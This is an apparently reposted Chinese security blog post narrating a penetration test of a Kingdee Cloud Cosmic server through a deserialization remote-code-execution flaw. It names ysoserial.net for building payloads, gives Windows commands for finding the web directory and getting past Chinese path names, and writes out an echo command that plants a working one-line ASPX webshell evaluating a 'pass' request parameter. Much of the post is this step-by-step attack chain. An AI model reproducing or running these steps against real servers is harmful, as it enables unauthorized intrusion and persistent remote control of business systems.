实战之金蝶RCE上传绕过

admin 2024年3月9日22:11:06评论20 views字数 982阅读3分16秒阅读模式

实战之金蝶RCE上传绕过
免责声明
由于传播、利用本公众号听风安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号听风安全及作者不为承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!

公众号现在只对常读和星标的公众号才展示大图推送,

建议大家把听风安全设为星标,否则可能就看不到啦!

----------------------------------------------------------------------

#

    风和日丽的一天,正沉浸在宁静的午后,手机突然传来一阵滴滴声,感觉大事不妙,取出手机一看,是一位老大哥发来消息,内容令人好奇:“兄弟,我们公司有个应用系统可能有点问题,帮忙测试一波看看?”面对老哥这么BT的请求,觉得是一个有意思的挑战,欣然答应,冲TYD。

实战之金蝶RCE上传绕过
实战之金蝶RCE上传绕过
打开网站是一个金碟云星空站点,想起前不久爆出来的反序列化rce漏洞
实战之金蝶RCE上传绕过
在进行测试时,发现这个系统存在金碟RCE漏洞。最初计划通过嘎嘎一顿输出直接命令上线C2服务器,但遇到了杀软的限制,且系统不允许使用远程下载命令。
使用ysoserial.net工具构造序列化数据实现RCE工具地址:https://github.com/pwntester/ysoserial.net使用工具生成payload
为了进一步渗透,我们考虑上传一个Shell文件。首先,我们需要查看文件结构,找到一个JS文件,进行文件名搜索,以确定目录位置。
实战之金蝶RCE上传绕过
**第一步:查看存在哪些盘**```cmdfsutil fsinfo drives
实战之金蝶RCE上传绕过
f: & cd & dir /S topca.js在F盘找到两个目录存在目标文件F:星空7.7ManageSitejscaF:星空7.7Websitejsca
实战之金蝶RCE上传绕过
发现进入目录的时候存在问题,无法使用中文,使用中文会直接乱码
实战之金蝶RCE上传绕过
使用通配符的方式进行中文绕过,例如:cd *7.7*
实战之金蝶RCE上传绕过
确定目录为F:星空7.7Websitejsca进行文件写入,注意尖括号需要进行转义cd F:*7.7*Websitejs & echo ^<%@ Page Language="Jscript"%^> ^<%eval(Request.Item["pass"],"unsafe");%^> > shell.aspx

实战之金蝶RCE上传绕过

连接shell
实战之金蝶RCE上传绕过
梳理过程写个报告给大哥交差,结束。

原文始发于微信公众号(听风安全):实战之金蝶RCE上传绕过

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年3月9日22:11:06
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   实战之金蝶RCE上传绕过https://cn-sec.com/archives/2558532.html

发表评论

匿名网友 填写信息